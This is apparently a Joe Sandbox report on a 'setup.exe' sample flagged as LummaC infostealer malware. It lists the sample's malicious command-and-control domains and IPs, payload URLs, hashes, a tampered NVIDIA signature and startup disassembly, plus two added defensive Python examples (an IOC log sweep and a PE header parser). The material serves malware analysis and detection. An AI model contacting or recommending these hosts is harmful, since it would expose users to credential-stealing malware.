https://www.ecosia.org/newtab/ | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.symauth.com/cps0( | setup.exe | false | (none) | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cegu.shop/8574262446/ph.txtebKit/537.36 | setup.exe, 00000000.00000002.4142166098.00000000031DA000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/Mi6a | setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2180534792.000000000129C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.starfieldtech.com/repository/0 | setup.exe | false | (none) | high
http://www.symauth.com/rpa00 | setup.exe | false | (none) | high
http://multicommander.com/updates/version.xml | setup.exe | false | Avira URL Cloud: safe | unknown
https://regularlavhis.click/apiP | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.microsof | setup.exe, 00000000.00000003.1901190667.0000000003C75000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/ | setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://regularlavhis.click/jhP | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cegu.shop/2 | setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | setup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cegu.shop/8574262446/ph.txtk | setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.96.1 | regularlavhis.click | United States (US) | 13335 | CLOUDFLARENET | true
185.161.251.21 | cegu.shop | United Kingdom (GB) | 5089 | NTL | false
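Added example, not part of the Joe Sandbox report: a small Python sweep that takes the network indicators from the tables above (the two contacted hosts and their IPs, plus the other hostnames listed in the configuration table) and runs them against proxy-log lines. The log format and the sample lines are constructed for the example. The confidence tiers are this example's own judgement, not the report's: a contacted domain is high, a configuration-list domain or a non-shared IP is medium, and the Cloudflare IP on its own is low, because AS13335 fronts many unrelated sites and the report ties 104.21.96.1 to regularlavhis.click only by the name it resolved.

```python
"""IOC sweep over proxy-log lines using the indicators from this report."""
import ipaddress
import re
from urllib.parse import urlparse

# Hosts the sample actually contacted (domains table above).
CONTACTED_DOMAINS = frozenset({"regularlavhis.click", "cegu.shop"})

# Other hostnames from the configuration table; the report marks them
# non-malicious with high reputation, so they are treated as a watchlist.
CONFIG_DOMAINS = frozenset({
    "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop",
    "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop",
})

# Contacted IPs from the IP/ASN table, mapped to the name they resolved.
CONTACTED_IPS = {"104.21.96.1": "regularlavhis.click", "185.161.251.21": "cegu.shop"}

# 104.21.96.1 is in AS13335 (Cloudflare); an IP-only hit there is low confidence.
SHARED_INFRA_IPS = frozenset({"104.21.96.1"})

# Constructed log format (assumption, not from the report): ts src method url dst_ip
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<dst>\S+)$")

# Constructed sample lines; the suspicious ones reuse URLs seen in the report.
SAMPLE_LOGS = [
    "2025-01-06T14:41:02Z 10.0.0.17 POST https://regularlavhis.click/api 104.21.96.1",
    "2025-01-06T14:41:05Z 10.0.0.17 GET https://cegu.shop/8574262446/ph.txt 185.161.251.21",
    "2025-01-06T14:41:09Z 10.0.0.23 GET https://example.com/ 104.21.96.1",
    "2025-01-06T14:41:11Z 10.0.0.23 GET https://duckduckgo.com/ac/?q=test 203.0.113.5",
    "2025-01-06T14:41:15Z 10.0.0.31 GET https://api.rabidcowse.shop/ 198.51.100.7",
    "2025-01-06T14:41:16Z 10.0.0.31 CONNECT 185.161.251.21:443 185.161.251.21",
    "garbage line that does not parse",
]


def domain_hit(host):
    """Exact or subdomain match; returns (apex, tier) or (None, None)."""
    host = host.lower().rstrip(".")
    for tier, doms in (("contacted", CONTACTED_DOMAINS), ("config", CONFIG_DOMAINS)):
        for dom in doms:
            if host == dom or host.endswith("." + dom):
                return dom, tier
    return None, None


def host_of(url):
    """Hostname from a URL, or the bare host of a CONNECT target like host:443."""
    parsed = urlparse(url if "://" in url else "//" + url)
    return (parsed.hostname or "").lower()


def classify(line):
    """Return a hit dict for one log line, or None when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host = host_of(m["url"])
    dom, tier = domain_hit(host)
    try:
        dst = str(ipaddress.ip_address(m["dst"]))
    except ValueError:
        dst = None
    ip_hit = dst in CONTACTED_IPS
    if tier == "contacted":
        confidence = "high"
    elif tier == "config" or (ip_hit and dst not in SHARED_INFRA_IPS):
        confidence = "medium"
    elif ip_hit:
        confidence = "low"  # shared-infrastructure IP only; confirm by hostname
    else:
        return None
    return {"src": m["src"], "host": host, "dst": dst, "domain": dom,
            "ip_match": CONTACTED_IPS.get(dst), "confidence": confidence}


def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["confidence"], hit["src"], hit["host"], hit["dst"], sep="\t")
```

The search-engine, CRL/OCSP and vendor support URLs from the memory-string table are deliberately not in the lists: the report marks them non-malicious with high reputation, and matching on them would flood the sweep with ordinary browser and certificate traffic.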
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1584823
                                                                                                      Start date and time:2025-01-06 15:39:10 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 8m 4s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:setup.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 44
                                                                                                      • Number of non-executed functions: 280
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:40:21 | API Interceptor | 9x Sleep call for process: setup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.96.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | installer_1.05_36.7.exe | malicious | LummaC Stealer |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Set-up.exe | malicious | LummaC |
185.161.251.21 | setup.exe | malicious | LummaC |
185.161.251.21 | 'Set-up.exe | malicious | LummaC |
185.161.251.21 | Set-up.exe | malicious | LummaC |
185.161.251.21 | SET_UP.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | installer_1.05_36.7.exe | malicious | LummaC Stealer | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | 'Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | SET_UP.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTL (GB) | https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql | malicious | HTMLPhisher | 194.168.231.153
NTL (GB) | Setup.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | installer_1.05_36.7.exe | malicious | LummaC Stealer | 185.161.251.21
NTL (GB) | Setup.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | Set-up.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | setup.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | 'Set-up.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | Set-up.exe | malicious | LummaC | 185.161.251.21
NTL (GB) | SET_UP.exe | malicious | LummaC | 185.161.251.21
CLOUDFLARENET (US) | setup.msi | malicious | Unknown | 104.21.32.152
CLOUDFLARENET (US) | https://sendbot.me/mousse-w0fysl7 | malicious | Unknown | 104.16.79.73
CLOUDFLARENET (US) | http://gleapis.com/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENET (US) | SET_UP.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENET (US) | http://jennadewanunwrapped.net | malicious | Unknown | 188.114.97.3
CLOUDFLARENET (US) | http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9 | malicious | Unknown | 172.66.0.145
CLOUDFLARENET (US) | Profile Illustrations and Technical Specifications for This System1.html | malicious | HTMLPhisher | 104.21.80.1
CLOUDFLARENET (US) | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENET (US) | anrek.mp4.hta | malicious | LummaC Stealer | 188.114.96.3
CLOUDFLARENET (US) | title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 172.67.208.58
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | anrek.mp4.hta | malicious | LummaC Stealer | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | un30brGAKP.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Patcher_I5cxa9AN.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | DansMinistrie.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | CrosshairX.exe | malicious | LummaC | 104.21.96.1, 185.161.251.21
                                                                                                                        No context
                                                                                                                        No created / dropped files found
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):0.46184887307140493
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:setup.exe
                                                                                                                        File size:74'715'544 bytes
                                                                                                                        MD5:86a4951d8e5a083679b90f2509f215fe
                                                                                                                        SHA1:426588739b61c2af6b584bfda1a571a9ee991ef7
                                                                                                                        SHA256:56ba7331a6db894aa092ecfc8bf691ae04ba7e5c6b4e3ba1067e67ce43f5e673
                                                                                                                        SHA512:6204ab5d09ea50462a9968b4f3171a60d3cefe578d9ed294c3e88a96ee5373d6fc5a929d4314b176a2da834a30de0c62d682a969c512298c802941996c7bd8b2
                                                                                                                        SSDEEP:24576:3RCePueJQjfQ4VTixBjK1aeXjfLiaE4JYCudSW:3RCeHJmLTixBjK8C/JY
                                                                                                                        TLSH:D9F79E217ED303E59B4277794B0EB7DF9F28B190DB9314FB524A024696C24F8433E96A
                                                                                                                        File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........jw...$...$...$...%...$d..%...$.d.$...$...%...$...%<..$...%...$.d.%...$.d.%...$.d.%\..$...%...$...$S..$rd.%...$rd.$...$...$...
                                                                                                                        Icon Hash:336d16b6e468712b
                                                                                                                        Entrypoint:0x446ffc
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x67696948 [Mon Dec 23 13:44:40 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:7e682a095f6400abd9015fa73bb7cbe7
Signature Valid:false
Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash computed over the file does not match the digest inside the signature, so the signed bytes were changed after signing or the signature block was attached to a binary it was never produced for; "Digitally signed: true" above only records that a signature blob is present)
Not Before:27/07/2015 20:00:00
Not After:26/07/2018 19:59:59
                                                                                                                        Subject Chain
                                                                                                                        • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                        Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                        Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                        Serial:14781BC862E8DC503A559346F5DCC518
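The header fields in this table and the section-table walk in the disassembly that follows are both things an analyst will want to reproduce rather than take from the sandbox's decoding. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the PE32 fields the report lists (TimeDateStamp to UTC, file and DLL characteristics, subsystem, entrypoint as ImageBase + AddressOfEntryPoint, and whether a security directory is present) and implements the RVA-to-section lookup that the routine after the entrypoint performs (e_lfanew at [eax+3Ch], SizeOfOptionalHeader at [ecx+14h], NumberOfSections at [ecx+06h], 0x28-byte section entries tested against VirtualAddress at [edx+0Ch] and VirtualSize at [edx+08h], which is what the MSVC CRT helper _FindPESection does). The header bytes it parses are constructed to carry the values the report shows; the section layout and the signature-blob location in those bytes are assumptions. A non-empty security directory only means an Authenticode blob is attached, which is consistent with "Digitally signed: true" alongside "Signature Valid: false" above; verifying it needs the Authenticode hash and chain check, which the example deliberately leaves out.

```python
# Added example (not from the Joe Sandbox report or the sample): parse the PE32
# header fields a triage report lists and locate the section holding an RVA.
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
SECURITY_DIRECTORY = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset/size of the Authenticode blob


def flags_to_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32(data):
    """Return the header fields a triage report shows; raises on non-PE32 input."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # the [eax+3Ch] read in the listing
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    fh = e_lfanew + 4                                         # IMAGE_FILE_HEADER
    _machine, nsections, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                              # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, oh)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled")
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]
    image_base = struct.unpack_from("<I", data, oh + 28)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    ndirs = struct.unpack_from("<I", data, oh + 92)[0]
    sec_size = 0
    if ndirs > SECURITY_DIRECTORY:
        _sec_off, sec_size = struct.unpack_from("<II", data, oh + 96 + 8 * SECURITY_DIRECTORY)
    # Section table = NT header + 0x18 + SizeOfOptionalHeader, as "lea edx,[ecx+18h]; add edx,eax" computes.
    sections = []
    for i in range(nsections):
        off = oh + opt_size + 40 * i
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize,
                         "raw_size": rawsize, "raw_ptr": rawptr})
    return {
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "file_characteristics": flags_to_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flags_to_names(dll_chars, DLL_CHARACTERISTICS),
        "subsystem": SUBSYSTEMS.get(subsystem, f"unknown ({subsystem})"),
        "os_version": f"{os_major}.{os_minor}",
        "image_base": image_base,
        "entrypoint_rva": entry_rva,
        "entrypoint": image_base + entry_rva,
        # Presence of a blob only; whether it verifies needs the Authenticode hash + chain check.
        "has_authenticode_blob": sec_size > 0,
        "sections": sections,
    }


def find_section(pe, rva):
    """Section whose [VirtualAddress, VirtualAddress + VirtualSize) holds rva, else None.
    Same test as the entrypoint loop: rva >= [edx+0Ch] and rva < [edx+0Ch] + [edx+08h]."""
    for s in pe["sections"]:
        if s["virtual_address"] <= rva < s["virtual_address"] + s["virtual_size"]:
            return s
    return None


def build_sample_headers():
    """Constructed PE32 headers (not bytes of setup.exe) carrying the values the report lists.
    Section sizes and the security-directory location are assumed for illustration."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 224                                           # PE32 optional header, 16 data directories
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x67696948, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x446FFC - 0x400000)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)              # ImageBase
    struct.pack_into("<HH", opt, 40, 6, 0)                 # OS version 6.0
    struct.pack_into("<HH", opt, 48, 6, 0)                 # subsystem version 6.0
    struct.pack_into("<HH", opt, 68, 2, 0x8140)            # GUI; DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIRECTORY, 0x1000, 0x2000)  # assumed blob location
    secs = b""
    for name, vsize, vaddr, rawsize, rawptr in ((b".text", 0xBE000, 0x1000, 0xBE000, 0x400),
                                                (b".data", 0x5000, 0xC0000, 0x2000, 0xBE400)):
        secs += name.ljust(8, b"\0") + struct.pack("<IIII", vsize, vaddr, rawsize, rawptr) + b"\0" * 16
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + secs


if __name__ == "__main__":
    pe = parse_pe32(build_sample_headers())
    for k, v in pe.items():
        if k != "sections":
            print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
    print("entrypoint section:", find_section(pe, pe["entrypoint_rva"])["name"])
```

Run against a real file by replacing build_sample_headers() with the file's bytes; for the report's values the timestamp decodes to 2024-12-23 13:44:40 UTC and the entrypoint RVA 0x46FFC falls in .text. The lookup deliberately uses VirtualSize rather than SizeOfRawData, matching the listing, so an RVA that lies in a section's zero-filled tail still resolves to that section.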
                                                                                                                        Instruction
                                                                                                                        call 00007F0988E4388Fh
                                                                                                                        jmp 00007F0988E42C8Fh
                                                                                                                        cmp ecx, dword ptr [004BF540h]
                                                                                                                        jne 00007F0988E42E13h
                                                                                                                        ret
                                                                                                                        jmp 00007F0988E430BEh
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                                        push esi
                                                                                                                        mov ecx, dword ptr [eax+3Ch]
                                                                                                                        add ecx, eax
                                                                                                                        movzx eax, word ptr [ecx+14h]
                                                                                                                        lea edx, dword ptr [ecx+18h]
                                                                                                                        add edx, eax
                                                                                                                        movzx eax, word ptr [ecx+06h]
                                                                                                                        imul esi, eax, 28h
                                                                                                                        add esi, edx
                                                                                                                        jmp 00007F0988E42E27h
                                                                                                                        mov ecx, dword ptr [edx+0Ch]
                                                                                                                        cmp dword ptr [ebp+0Ch], ecx
                                                                                                                        jc 00007F0988E42E1Ch
                                                                                                                        mov eax, dword ptr [edx+08h]
                                                                                                                        add eax, ecx
                                                                                                                        cmp dword ptr [ebp+0Ch], eax
                                                                                                                        jc 00007F0988E42E1Eh
                                                                                                                        add edx, 28h
                                                                                                                        cmp edx, esi
                                                                                                                        jne 00007F0988E42DF9h
                                                                                                                        xor eax, eax
                                                                                                                        pop esi
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        mov eax, edx
                                                                                                                        jmp 00007F0988E42E0Bh
                                                                                                                        push esi
                                                                                                                        call 00007F0988E43E65h
                                                                                                                        test eax, eax
                                                                                                                        je 00007F0988E42E32h
                                                                                                                        mov eax, dword ptr fs:[00000018h]
                                                                                                                        mov esi, 004C3C38h
                                                                                                                        mov edx, dword ptr [eax+04h]
                                                                                                                        jmp 00007F0988E42E16h
                                                                                                                        cmp edx, eax
                                                                                                                        je 00007F0988E42E22h
                                                                                                                        xor eax, eax
                                                                                                                        mov ecx, edx
                                                                                                                        lock cmpxchg dword ptr [esi], ecx
                                                                                                                        test eax, eax
                                                                                                                        jne 00007F0988E42E02h
                                                                                                                        xor al, al
                                                                                                                        pop esi
                                                                                                                        ret
                                                                                                                        mov al, 01h
                                                                                                                        pop esi
                                                                                                                        ret
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+08h], 00000000h
                                                                                                                        jne 00007F0988E42E19h
                                                                                                                        mov byte ptr [004C3C3Ch], 00000001h
                                                                                                                        call 00007F0988E43AF7h
                                                                                                                        call 00007F0988E6BA1Eh
                                                                                                                        test al, al
                                                                                                                        jne 00007F0988E42E16h
                                                                                                                        xor al, al
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        call 00007F0988E7CE6Bh
                                                                                                                        test al, al
                                                                                                                        jne 00007F0988E42E1Ch
                                                                                                                        push 00000000h
                                                                                                                        call 00007F0988E6BA25h
                                                                                                                        pop ecx
                                                                                                                        jmp 00007F0988E42DFBh
                                                                                                                        mov al, 01h
                                                                                                                        pop ebp
                                                                                                                        ret
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
